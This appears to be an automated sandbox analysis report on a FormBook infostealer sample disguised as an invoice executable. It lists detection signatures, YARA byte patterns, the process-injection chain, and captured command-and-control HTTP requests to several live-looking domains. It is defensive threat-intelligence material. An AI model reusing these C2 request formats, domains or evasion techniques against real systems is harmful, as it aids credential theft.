Windows Analysis Report
PROFOMA INVOICE SHEET.exe

Overview

General Information

Sample name: PROFOMA INVOICE SHEET.exe
Analysis ID: 1511723
MD5: bc8d560138e7ac511f70880fc394ad2d
SHA1: ab4eba09f7c4ba9e4dda6d9001f310347540d665
SHA256: 50298005475ae317206625562212774d14ecad26a7fd979251618b53f5c65d22
Tags: exe, Formbook

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
Found API chain indicative of sandbox detection
Found direct / indirect Syscall (likely to bypass EDR)
Initial sample is a PE file and has a suspicious name
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • PROFOMA INVOICE SHEET.exe (PID: 7348 cmdline: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe" MD5: BC8D560138E7AC511F70880FC394AD2D)
    • svchost.exe (PID: 7368 cmdline: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • bJWYsPIiPtg.exe (PID: 1508 cmdline: "C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • TapiUnattend.exe (PID: 7764 cmdline: "C:\Windows\SysWOW64\TapiUnattend.exe" MD5: D5BFFD755F566AAACB57CF83FDAA5CD0)
          • bJWYsPIiPtg.exe (PID: 5964 cmdline: "C:\Program Files (x86)\RfROWPNfeEeMhEHCSXbdGLViWmdmHBsjoawtthEEJ\bJWYsPIiPtg.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7920 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches in memory dumps (Source | Rule | Description | Author; matched strings are listed beneath the rule):

00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2c1a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2c1a0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x1420f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
(The full report lists 11 memory-dump entries; the remainder are collapsed in this export.)

Yara matches in unpacked PE files (Source | Rule | Description | Author):

1.2.svchost.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2e5e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16652:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
1.2.svchost.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
1.2.svchost.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2f3e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17452:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

System Summary

Source: Process started; Author: Florian Roth (Nextron Systems); Data: Command: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", CommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", ParentImage: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe, ParentProcessId: 7348, ParentProcessName: PROFOMA INVOICE SHEET.exe, ProcessCommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", ProcessId: 7368, ProcessName: svchost.exe
Source: Process started; Author: vburov; Data: Command: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", CommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", CommandLine|base64offset|contains: N !, Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", ParentImage: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe, ParentProcessId: 7348, ParentProcessName: PROFOMA INVOICE SHEET.exe, ProcessCommandLine: "C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe", ProcessId: 7368, ProcessName: svchost.exe
No Suricata rule has matched

AV Detection

Source: PROFOMA INVOICE SHEET.exe; Avira: detected
Source: PROFOMA INVOICE SHEET.exe; ReversingLabs: Detection: 50%
Source: PROFOMA INVOICE SHEET.exe; Virustotal: Detection: 25%
Source: Yara match; File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000006.00000002.4149796746.0000000002D80000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4149856590.0000000002DD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2117687090.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000002.4150699714.0000000002570000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.4149551530.00000000028E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2118026660.0000000003AD0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.4150549424.00000000039C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000001.00000002.2118406683.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample; Integrated Neural Analysis Model: Matched 100.0% probability
Source: PROFOMA INVOICE SHEET.exe; Joe Sandbox ML: detected
Source: PROFOMA INVOICE SHEET.exe; Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: TapiUnattend.pdbGCTL source: svchost.exe, 00000001.00000002.2117869256.0000000003619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2117847522.0000000003600000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150058173.0000000000747000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: bJWYsPIiPtg.exe, 00000005.00000002.4149955511.00000000006DE000.00000002.00000001.01000000.00000005.sdmp, bJWYsPIiPtg.exe, 00000007.00000000.2210396231.00000000006DE000.00000002.00000001.01000000.00000005.sdmp
            Source: Binary string: wntdll.pdbUGP source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1700292312.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PROFOMA INVOICE SHEET.exe, 00000000.00000003.1701875462.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2019260041.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2017040925.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2140485338.000000000312B000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.000000000347E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2135530288.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: PROFOMA INVOICE SHEET.exe, 00000000.00000003.1700292312.0000000004770000.00000004.00001000.00020000.00000000.sdmp, PROFOMA INVOICE SHEET.exe, 00000000.00000003.1701875462.0000000003A10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.2019260041.0000000003A00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003D9E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2118057527.0000000003C00000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.2017040925.0000000003800000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, TapiUnattend.exe, 00000006.00000003.2140485338.000000000312B000.00000004.00000020.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.00000000032E0000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4150873460.000000000347E000.00000040.00001000.00020000.00000000.sdmp, TapiUnattend.exe, 00000006.00000003.2135530288.0000000002F7C000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: TapiUnattend.exe, 00000006.00000002.4151512701.000000000390C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.000000000294C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2439300698.000000002304C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: TapiUnattend.exe, 00000006.00000002.4151512701.000000000390C000.00000004.10000000.00040000.00000000.sdmp, TapiUnattend.exe, 00000006.00000002.4149956479.0000000002E84000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000007.00000002.4150963531.000000000294C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000008.00000002.2439300698.000000002304C000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: TapiUnattend.pdb source: svchost.exe, 00000001.00000002.2117869256.0000000003619000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.2117847522.0000000003600000.00000004.00000020.00020000.00000000.sdmp, bJWYsPIiPtg.exe, 00000005.00000002.4150058173.0000000000747000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe; Code function: 0_2_003768EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe; Code function: 0_2_0037698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe; Code function: 0_2_0036D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe; Code function: 0_2_0036D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe; Code function: 0_2_00379642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe; Code function: 0_2_0037979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe; Code function: 0_2_00379B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe; Code function: 0_2_0036DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe; Code function: 0_2_00375C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\TapiUnattend.exe; Code function: 6_2_028FC5F0 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Windows\SysWOW64\TapiUnattend.exe; Code function: 4x nop then xor eax, eax (6_2_028E9BB0)
Source: C:\Windows\SysWOW64\TapiUnattend.exe; Code function: 4x nop then mov ebx, 00000004h (6_2_031104E3)
Source: Joe Sandbox View; IP Address: 136.143.186.12
Source: unknown; UDP traffic detected without corresponding DNS query: 1.1.1.1 (reported 14 times)
Source: C:\Users\user\Desktop\PROFOMA INVOICE SHEET.exe; Code function: 0_2_0037CE44 InternetReadFile,SetEvent,GetLastError,SetEvent
            Source: global trafficHTTP traffic detected: GET /lpl9/?h2Pt9=e8lWkFdpBI8fMqvrlwy/onG3BcZVz7zQmYaHg/xvgOUuLw6B3kGtYYWM8/CK9QzH2IDr1kJuLXtu8i/nZF8LLdKb2VMPvKTLf5QxvZUWo2Nd+FhaQzJMI4o=&4RLhs=7BJLM4eH HTTP/1.1Host: www.aaavvejibej.bondAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /30jd/?h2Pt9=OtDeNxpSfKodwTIu4nnA+ux6enUP6PpldrB0PRj1l4+Fh7wLXn4C+U6iIOCzG6zWS3UsP4q8AKFA04SbUzJ+fbd5Tc1EuJbYoHYXowwdmRoBcyVO6/LzqMo=&4RLhs=7BJLM4eH HTTP/1.1Host: www.whats-in-the-box.orgAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /4hiy/?h2Pt9=x7+2I8SGsUecCMiSjTFbl5lp6Hdc+2w1VtibsJt/MsyL3kCUaBIR7/SGJ6EjRkH0LM2kKQMRMq/OnwKr8gWiX4rGIBeWvoECrZmU86sauZftBWicToOcLZk=&4RLhs=7BJLM4eH HTTP/1.1Host: www.weatherbook.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /jvjp/?h2Pt9=4b5MqvIelA8yeSWKDPRIdHesNV5XUrpBTJ6STZ7OqVlET0aP4dQGxyJ8Yal1yomp/rzgkCoCCWVuqR9lxGRqCv57Hh5Ivk5Sj0mDZDuer/ujvu4zkb6QZi8=&4RLhs=7BJLM4eH HTTP/1.1Host: www.crowsecurity.cloudAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /p8sm/?h2Pt9=gudxXcfIjfM6RSgjlHSXwEEWc2+zEXg0KLmBWaNcxhhcux8g2aNs+kqO3FQMDVnLkpHMsugYGQwIm+gz0yjubt2jusNNuut2QLx2iafcYqdrxcPN6iJJGks=&4RLhs=7BJLM4eH HTTP/1.1Host: www.inspireplay.liveAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /p2q3/?h2Pt9=FK2L+8PIei1GuvtlS8gCO8fM4ZQmscEbBI34s0k1PsRmujAOjfMM4GbCZxnV6srYixPIeZB0oPqoKkF830AnIDgf70T/wPSZ3Q0Y3Iy42KJKjy26SpAoBvI=&4RLhs=7BJLM4eH HTTP/1.1Host: www.shanhaiguan.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /ivo1/?h2Pt9=fL7FGqwZgFyeKETJ58v2LpmodVM6vZtD0XO9xnYIy5nXxzuHXVLl0+u5SqQtPDeu0FT/+Cn/ojl8jT3mUhnhpKNreTIBn1GsPPCO7XuNhO+zSMbYdoB0rmQ=&4RLhs=7BJLM4eH HTTP/1.1Host: www.lanxuanz.techAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /85su/?h2Pt9=+3B6fjGs9Z40sbhWxh4Olw8ODpxTfKIF4isjbFYKdetJPWg+iKgIwujGEU5yKjzj4BkeFS8xvi4EjdbOtsLgFdPJH1ajNMdDlKenjZRhD3fwrVi0trMy8bo=&4RLhs=7BJLM4eH HTTP/1.1Host: www.selftip.topAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /72tr/?4RLhs=7BJLM4eH&h2Pt9=QZWebiUhaLdmwus6tw46di6RDKjv7nbCBMEilCJ9bJwWpmwjRhGQJpTR6+hRUKDDRrrjNlIlSQ84SzFoivqKQb5yDyJKTfd8P5RA0nco9Gqas/wnYV+AlJk= HTTP/1.1Host: www.newdaydawning.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /2mtz/?4RLhs=7BJLM4eH&h2Pt9=IfYyAdGVqG15+W1eWJCxS0ORt4nu6IY1D62BdBAlUg+344eMNCzJLfy5jwznGJhpNs/P9siyZSS4xk9tvxK5ee8p4hJaGD9LflzCx/QbEnNrt30eVgRceG0= HTTP/1.1Host: www.o731lh.vipAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
            Source: global trafficHTTP traffic detected: GET /zl4r/?h2Pt9=qAyzze+7Xxv+wA09CtJQAc1N08fgxsYjMF3PXk0d3f7QX0q4Jz2C7sJqIlEgcTB+GqBDI184c5mD0TMdCmIzOUWEYKg5UaPGXuwVBW400SE67lweB1cXDRo=&4RLhs=7BJLM4eH HTTP/1.1Host: www.wajf.netAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8Accept-Language: en-usConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
Source: global traffic; DNS traffic detected: DNS query: 15.164.165.52.in-addr.arpa
Source: global traffic; DNS traffic detected: DNS query: www.aaavvejibej.bond
Source: global traffic; DNS traffic detected: DNS query: www.whats-in-the-box.org
Source: global traffic; DNS traffic detected: DNS query: www.weatherbook.live
Source: global traffic; DNS traffic detected: DNS query: www.crowsecurity.cloud
Source: global traffic; DNS traffic detected: DNS query: www.inspireplay.live
Source: global traffic; DNS traffic detected: DNS query: www.shanhaiguan.net
Source: global traffic; DNS traffic detected: DNS query: www.lanxuanz.tech
Source: global traffic; DNS traffic detected: DNS query: www.selftip.top
Source: global traffic; DNS traffic detected: DNS query: www.newdaydawning.net
Source: global traffic; DNS traffic detected: DNS query: www.kfowks.site
Source: global traffic; DNS traffic detected: DNS query: www.o731lh.vip
Source: global traffic; DNS traffic detected: DNS query: www.wajf.net
Source: global traffic; DNS traffic detected: DNS query: www.turbonotes.app
Source: unknown; HTTP traffic detected: POST /30jd/ HTTP/1.1
  Host: www.whats-in-the-box.org
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-us
  Accept-Encoding: gzip, deflate
  Origin: http://www.whats-in-the-box.org
  Content-Type: application/x-www-form-urlencoded
  Connection: close
  Cache-Control: no-cache
  Content-Length: 202
  Referer: http://www.whats-in-the-box.org/30jd/
  User-Agent: Mozilla/4.0 (compatible; MSIE 11.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.3)
  Data Ascii: h2Pt9=Dvr+OHpWQbs87hIyj33C7fZFRHU5wP9KVrMdChK9u5+iueU8N2EloHzVddWGEpiPNAhSP4O0UL95y4GvcyNee6odSLpUmvPHx0wvviY9uQIYcDoo1sbc29QePXo+XqH7yysJd2p6Med4h+95wk8pEFjSvWnfSLG5eOCNY/PviSL9dCj0faFWaOdxpFzMNTlgsg==
Source: global traffic; HTTP traffic detected: HTTP/1.1 403 Forbidden
  Date: Mon, 16 Sep 2024 07:29:57 GMT
  Content-Type: text/plain; charset=UTF-8
  Content-Length: 16
  Connection: close
  X-Frame-Options: SAMEORIGIN
  Referrer-Policy: same-origin
  Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
  Expires: Thu, 01 Jan 1970 00:00:01 GMT
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pWpR%2BI4f4f%2Brp%2ByE%2BGjg2jCJEDTCiHHL2xIp7cz4mT3EwEw7AY3CST4x6ar8vwQjXnWGGX9GWjVS9UsLLFbmoaeJmhFIudQhL8qC5p1OTkmbVOMYZcJhTsSbTE7JVLWZ3eaGO2fKKg%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 8c3f2600880043be-EWR
  alt-svc: h3=":443"; ma=86400
  Data Ascii: error code: 1010
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 16 Sep 2024 07:32:05 GMTServer: ApacheContent-Length: 774Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 3e 0d 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0d 0a 0d 0a 09 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 37 30 30 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 0d 0a 09 3c 6c 69 6e 6b 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 34 30 34 2e 63 73 73 22 20 2f 3e 0d 0a 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 0d 0a 3c 62 6f 64 79 3e 0d 0a 0d 0a 09 3c 64 69 76 20 69 64 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6e 6f 74 66 6f 75 6e 64 22 3e 0d 0a 09 09 09 3c 64 69 76 20 63 